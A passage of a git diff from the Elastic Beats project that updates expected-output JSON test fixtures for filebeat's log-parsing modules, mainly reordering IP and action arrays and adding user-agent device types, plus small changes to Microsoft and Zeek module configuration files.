@@ -4722,8 +4784,8 @@ "iatnulap7662.internal.local" ], "related.ip": [ - "10.248.108.55", - "10.120.215.174" + "10.120.215.174", + "10.248.108.55" ], "related.user": [ "prehend" @@ -4737,8 +4799,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "rema", "rsa.misc.action": [ - "uatDu", - "Allowed" + "Allowed", + "uatDu" ], "rsa.misc.category": "ent", "rsa.misc.filter": "iscivel", @@ -4764,6 +4826,7 @@ "url.original": "https://internal.example.org/ddoeiusm/apa.txt?uptatemU=rem#onorumet", "user.name": "prehend", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -4811,8 +4874,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "modit", "rsa.misc.action": [ - "uteiru", - "Allowed" + "Allowed", + "uteiru" ], "rsa.misc.category": "qua", "rsa.misc.filter": "saute", @@ -4838,6 +4901,7 @@ "url.original": "https://www5.example.net/yCice/uinesci.htm?taevitae=dminimv#quam", "user.name": "abo", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -4872,8 +4936,8 @@ "onorumet4871.lan" ], "related.ip": [ - "10.129.66.196", - "10.7.152.238" + "10.7.152.238", + "10.129.66.196" ], "related.user": [ "equamn" @@ -4887,8 +4951,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "vento", "rsa.misc.action": [ - "reh", - "Blocked" + "Blocked", + "reh" ], "rsa.misc.category": "atev", "rsa.misc.filter": "umq", 
@@ -4914,6 +4978,7 @@ "url.original": "https://api.example.com/itinvolu/adeserun.txt?tinv=Utenima#nse", "user.name": "equamn", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -4990,6 +5055,7 @@ "url.original": "https://www.example.org/sci/isquames.gif?tlabor=itecto#loreeuf", "user.name": "evelite", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -5066,6 +5132,7 @@ "url.original": "https://mail.example.org/umdolo/nimv.htm?equunt=tutla#usmod", "user.name": "eavolupt", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", 
@@ -5142,6 +5209,7 @@ "url.original": "https://mail.example.net/tvol/ostru.htm?oei=iquipex#byCice", "user.name": "Nequepo", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -5191,8 +5259,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "plicab", "rsa.misc.action": [ - "umq", - "Blocked" + "Blocked", + "umq" ], "rsa.misc.category": "eruntmol", "rsa.misc.filter": "labore", @@ -5218,6 +5286,7 @@ "url.original": "https://mail.example.org/pariatur/cita.html?equuntur=rve#atemacc", "user.name": "edict", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -5252,8 +5321,8 @@ "aturExc7343.invalid" ], "related.ip": [ - "10.146.69.38", - "10.55.192.102" + "10.55.192.102", + "10.146.69.38" ], "related.user": [ "quia" @@ -5294,6 +5363,7 @@ "url.original": "https://example.org/aturE/aaliqu.gif?nvol=doloreeu#elillumq", "user.name": "quia", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -5328,8 +5398,8 @@ "olo7317.www5.localhost" ], "related.ip": [ - "10.124.177.226", - "10.249.1.143" + "10.249.1.143", + "10.124.177.226" ], "related.user": [ "isciveli" 
@@ -5343,8 +5413,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "Utenim", "rsa.misc.action": [ - "Allowed", - "onevo" + "onevo", + "Allowed" ], "rsa.misc.category": "tdolore", "rsa.misc.filter": "ptasn", @@ -5370,6 +5440,7 @@ "url.original": "https://internal.example.org/olorin/orisnisi.gif?eritquii=atevelit#dese", "user.name": "isciveli", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -5404,8 +5475,8 @@ "uiin1342.mail.invalid" ], "related.ip": [ - "10.167.176.220", - "10.146.228.249" + "10.146.228.249", + "10.167.176.220" ], "related.user": [ "estla" @@ -5446,6 +5517,7 @@ "url.original": "https://example.org/vel/preh.html?sequamni=edutpers#deo", "user.name": "estla", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -5480,8 +5552,8 @@ "agna5654.www.corp" ], "related.ip": [ - "10.200.74.101", - "10.203.47.23" + "10.203.47.23", + "10.200.74.101" ], "related.user": [ "litesse" @@ -5495,8 +5567,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "nde", "rsa.misc.action": [ - "iqu", - "Allowed" + "Allowed", + "iqu" ], "rsa.misc.category": "ametco", "rsa.misc.filter": "ntincul", 
@@ -5522,6 +5594,7 @@ "url.original": "https://example.com/nonproi/dolor.jpg?molli=oeiusm#aUtenim", "user.name": "litesse", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -5556,8 +5629,8 @@ "ites5711.internal.host" ], "related.ip": [ - "10.24.23.209", - "10.162.78.48" + "10.162.78.48", + "10.24.23.209" ], "related.user": [ "ntore" @@ -5571,8 +5644,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ereprehe", "rsa.misc.action": [ - "Blocked", - "tutl" + "tutl", + "Blocked" ], "rsa.misc.category": "mip", "rsa.misc.filter": "umSecti", @@ -5598,6 +5671,7 @@ "url.original": "https://example.com/sedqui/iuntNe.gif?epteu=nvent#uepor", "user.name": "ntore", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5647,8 +5721,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "diconseq", "rsa.misc.action": [ - "Allowed", - "umet" + "umet", + "Allowed" ], "rsa.misc.category": "ciad", "rsa.misc.filter": "oeiusmod", @@ -5674,6 +5748,7 @@ "url.original": "https://www5.example.net/lits/Nemoen.txt?elillu=seruntmo#imidest", "user.name": "squir", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", 
@@ -5708,8 +5783,8 @@ "ngelitse7535.internal.lan" ], "related.ip": [ - "10.209.203.156", - "10.110.16.169" + "10.110.16.169", + "10.209.203.156" ], "related.user": [ "mes" @@ -5750,6 +5825,7 @@ "url.original": "https://example.org/eius/evo.jpg?iarchit=volupt#ipis", "user.name": "mes", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5784,8 +5860,8 @@ "tiumtot3611.internal.localdomain" ], "related.ip": [ - "10.107.68.114", - "10.84.9.150" + "10.84.9.150", + "10.107.68.114" ], "related.user": [ "sequatDu" @@ -5799,8 +5875,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "omnis", "rsa.misc.action": [ - "Allowed", - "uianonnu" + "uianonnu", + "Allowed" ], "rsa.misc.category": "Excepteu", "rsa.misc.filter": "enimadmi", @@ -5826,6 +5902,7 @@ "url.original": "https://www5.example.net/equun/veli.gif?tem=iadeseru#uiineavo", "user.name": "sequatDu", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5860,8 +5937,8 @@ "gnaa4656.api.example" ], "related.ip": [ - "10.26.222.144", - "10.124.119.48" + "10.124.119.48", + "10.26.222.144" ], "related.user": [ "nre" 
@@ -5902,6 +5979,7 @@ "url.original": "https://internal.example.com/ecatcu/tMalo.txt?nse=rauto#rese", "user.name": "nre", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -5936,8 +6014,8 @@ "psaqu6066.www5.localhost" ], "related.ip": [ - "10.164.190.2", - "10.223.11.164" + "10.223.11.164", + "10.164.190.2" ], "related.user": [ "ten" @@ -5951,8 +6029,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "officiad", "rsa.misc.action": [ - "Allowed", - "antium" + "antium", + "Allowed" ], "rsa.misc.category": "emoeni", "rsa.misc.filter": "itvo", @@ -5978,6 +6056,7 @@ "url.original": "https://mail.example.org/ntutlabo/leumiure.htm?eacommo=amqua#tionevol", "user.name": "ten", "user_agent.device.name": "LM-V350", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -6027,8 +6106,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "vitaedic", "rsa.misc.action": [ - "rinc", - "Blocked" + "Blocked", + "rinc" ], "rsa.misc.category": "prehende", "rsa.misc.filter": "rume", 
@@ -6054,6 +6133,7 @@ "url.original": "https://www.example.org/ugitsed/ritatis.jpg?xplic=stenat#mquis", "user.name": "umwr", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -6088,8 +6168,8 @@ "uame1361.api.local" ], "related.ip": [ - "10.10.93.133", - "10.90.20.202" + "10.90.20.202", + "10.10.93.133" ], "related.user": [ "evita" @@ -6103,8 +6183,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "tat", "rsa.misc.action": [ - "nia", - "Blocked" + "Blocked", + "nia" ], "rsa.misc.category": "turQuis", "rsa.misc.filter": "nonp", @@ -6130,6 +6210,7 @@ "url.original": "https://mail.example.com/aute/dictasu.gif?ptas=iadolo#cidu", "user.name": "evita", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -6179,8 +6260,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "Exce", "rsa.misc.action": [ - "Allowed", - "ulapa" + "ulapa", + "Allowed" ], "rsa.misc.category": "reprehen", "rsa.misc.filter": "itsedqui", 
@@ -6206,6 +6287,7 @@ "url.original": "https://mail.example.net/enbyCic/aturau.gif?orroqui=sci#psamvolu", "user.name": "tectobe", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -6282,6 +6364,7 @@ "url.original": "https://example.org/olu/mqua.txt?mdolore=ita#aeratvol", "user.name": "isnos", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -6316,8 +6399,8 @@ "tat6671.www.local" ], "related.ip": [ - "10.236.55.236", - "10.149.6.107" + "10.149.6.107", + "10.236.55.236" ], "related.user": [ "redolo" @@ -6331,8 +6414,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "uis", "rsa.misc.action": [ - "mvele", - "Allowed" + "Allowed", + "mvele" ], "rsa.misc.category": "vitaedi", "rsa.misc.filter": "ndeomni", @@ -6358,6 +6441,7 @@ "url.original": "https://api.example.net/mnisiut/eabil.jpg?psumqui=trude#ccusa", "user.name": "redolo", "user_agent.device.name": "LM-V350", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 10", 
@@ -6434,6 +6518,7 @@ "url.original": "https://api.example.net/uamestq/eetdol.html?ctionofd=uianonnu#ntNeque", "user.name": "colab", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -6483,8 +6568,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "itautf", "rsa.misc.action": [ - "Blocked", - "mini" + "mini", + "Blocked" ], "rsa.misc.category": "gna", "rsa.misc.filter": "usmo", @@ -6510,6 +6595,7 @@ "url.original": "https://mail.example.net/ius/msequ.jpg?ptat=tionula#gnido", "user.name": "umdolo", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -6559,8 +6645,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "issuscip", "rsa.misc.action": [ - "remap", - "Blocked" + "Blocked", + "remap" ], "rsa.misc.category": "eetdolo", "rsa.misc.filter": "rsitam", @@ -6586,6 +6672,7 @@ "url.original": "https://www.example.org/iat/acom.html?umdolo=oluptass#umqu", "user.name": "mnisiuta", "user_agent.device.name": "LM-V350", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 10", 
@@ -6662,6 +6749,7 @@ "url.original": "https://www.example.com/onorum/umiure.gif?lites=admini#trumexer", "user.name": "aeabillo", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -6711,8 +6799,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ilmoles", "rsa.misc.action": [ - "Blocked", - "tatisetq" + "tatisetq", + "Blocked" ], "rsa.misc.category": "ametco", "rsa.misc.filter": "liquide", @@ -6738,6 +6826,7 @@ "url.original": "https://mail.example.org/veni/rspi.htm?ntium=imadmi#dquiac", "user.name": "tNequ", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -6814,6 +6903,7 @@ "url.original": "https://www.example.com/tem/litsedq.htm?ium=utfugit#beat", "user.name": "uptat", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -6844,8 +6934,8 @@ "icero1297.internal.domain" ], "related.ip": [ - "10.138.193.38", - "10.46.71.46" + "10.46.71.46", + "10.138.193.38" ], "related.user": [ "sintocca" 
@@ -6886,6 +6976,7 @@ "url.original": "https://www.example.com/amcola/eumiurer.gif?stiaeco=equu#laborisn", "user.name": "sintocca", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -6916,8 +7007,8 @@ "oloremeu5047.www5.invalid" ], "related.ip": [ - "10.254.119.31", - "10.172.159.251" + "10.172.159.251", + "10.254.119.31" ], "related.user": [ "usm" @@ -6931,8 +7022,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "imadmi", "rsa.misc.action": [ - "tatemacc", - "Blocked" + "Blocked", + "tatemacc" ], "rsa.misc.category": "tutlabor", "rsa.misc.filter": "eturad", @@ -6958,6 +7049,7 @@ "url.original": "https://api.example.net/sedquian/lamcorpo.html?sequatD=Nequepo#veleum", "user.name": "usm", "user_agent.device.name": "U20", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90", "user_agent.os.full": "Android 6.0", @@ -7007,8 +7099,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "isnost", "rsa.misc.action": [ - "oriosa", - "Allowed" + "Allowed", + "oriosa" ], "rsa.misc.category": "uis", "rsa.misc.filter": "nemul", 
@@ -7034,6 +7126,7 @@ "url.original": "https://www5.example.com/ictasun/iumto.txt?erro=admin#uisnostr", "user.name": "ptassit", "user_agent.device.name": "Samsung SM-A715F", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]", "user_agent.os.full": "Android 10", @@ -7110,6 +7203,7 @@ "url.original": "https://www5.example.org/oriosa/ssusc.htm?atemacc=rsitvolu#isi", "user.name": "eroi", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -7144,8 +7238,8 @@ "nos4114.api.lan" ], "related.ip": [ - "10.31.58.6", - "10.198.84.190" + "10.198.84.190", + "10.31.58.6" ], "related.user": [ "unt" @@ -7186,6 +7280,7 @@ "url.original": "https://mail.example.net/tseddoei/byCi.gif?assitas=nul#ame", "user.name": "unt", "user_agent.device.name": "Android", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80", "user_agent.os.full": "Android 5.1.1", @@ -7235,8 +7330,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "rrorsi", "rsa.misc.action": [ - "exe", - "Allowed" + "Allowed", + "exe" ], "rsa.misc.category": "mnihi", "rsa.misc.filter": "consequa", 
@@ -7262,6 +7357,7 @@ "url.original": "https://www5.example.org/liquipe/rehe.gif?niamqu=uioffi#suntin", "user.name": "hende", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -7296,8 +7392,8 @@ "ueip6097.api.host" ], "related.ip": [ - "10.128.43.71", - "10.152.217.174" + "10.152.217.174", + "10.128.43.71" ], "related.user": [ "mquiado" @@ -7338,6 +7434,7 @@ "url.original": "https://www.example.org/erit/asiarch.gif?tdolor=oremagna#siuta", "user.name": "mquiado", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -7372,8 +7469,8 @@ "fugiatqu7793.www.localdomain" ], "related.ip": [ - "10.26.149.221", - "10.217.193.148" + "10.217.193.148", + "10.26.149.221" ], "related.user": [ "uisa" @@ -7387,8 +7484,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "tionemu", "rsa.misc.action": [ - "Blocked", - "rehe" + "rehe", + "Blocked" ], "rsa.misc.category": "aecons", "rsa.misc.filter": "aturve", @@ -7414,6 +7511,7 @@ "url.original": "https://mail.example.org/maven/tectob.jpg?litsedd=mnis#ainci", "user.name": "uisa", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", 
@@ -7448,8 +7546,8 @@ "onsequ3168.www.corp" ], "related.ip": [ - "10.172.17.6", - "10.109.192.53" + "10.109.192.53", + "10.172.17.6" ], "related.user": [ "eprehen" @@ -7490,6 +7588,7 @@ "url.original": "https://www.example.com/siarch/oloremi.htm?one=iduntutl#tNe", "user.name": "eprehen", "user_agent.device.name": "U20", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90", "user_agent.os.full": "Android 6.0", @@ -7539,8 +7638,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "exeacomm", "rsa.misc.action": [ - "volup", - "Blocked" + "Blocked", + "volup" ], "rsa.misc.category": "ten", "rsa.misc.filter": "ssecil", @@ -7566,6 +7665,7 @@ "url.original": "https://mail.example.com/ostr/liqu.txt?niam=mullamc#umtota", "user.name": "ore", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", diff --git a/x-pack/filebeat/module/zscaler/zia/test/test.log-expected.json b/x-pack/filebeat/module/zscaler/zia/test/test.log-expected.json index d2e89ea6140..f651e843b07 100644 --- a/x-pack/filebeat/module/zscaler/zia/test/test.log-expected.json +++ b/x-pack/filebeat/module/zscaler/zia/test/test.log-expected.json @@ -31,8 +31,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "", "rsa.misc.action": [ - "", - "" + "", + "" ], "rsa.misc.category": "", "rsa.misc.filter": "", 
@@ -54,6 +54,7 @@ "url.original": "", "user.name": "", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" } diff --git a/x-pack/filebeat/modules.d/microsoft.yml.disabled b/x-pack/filebeat/modules.d/microsoft.yml.disabled index 63bcc20897a..43944caad29 100644 --- a/x-pack/filebeat/modules.d/microsoft.yml.disabled +++ b/x-pack/filebeat/modules.d/microsoft.yml.disabled @@ -28,7 +28,11 @@ #var.oauth2.client.secret: "" # Oauth Token URL, should include the tenant ID - #var.oauth2.token_url: "https://login.microsoftonline.com/TENANT-ID/oauth2/token" + #var.oauth2.token_url: "https://login.microsoftonline.com/TENANT-ID/oauth2/v2.0/token" + + # Related scopes, default should be included + #var.oauth2.scopes: + # - "https://api.security.microsoft.com/.default" dhcp: enabled: true diff --git a/x-pack/filebeat/modules.d/zeek.yml.disabled b/x-pack/filebeat/modules.d/zeek.yml.disabled index feacbf939d6..d1349bf1388 100644 --- a/x-pack/filebeat/modules.d/zeek.yml.disabled +++ b/x-pack/filebeat/modules.d/zeek.yml.disabled @@ -34,6 +34,8 @@ enabled: true notice: enabled: true + ntp: + enabled: true ntlm: enabled: true ocsp: diff --git a/x-pack/functionbeat/Dockerfile b/x-pack/functionbeat/Dockerfile index 3aa5e4bf820..7f043ffad55 100644 --- a/x-pack/functionbeat/Dockerfile +++ 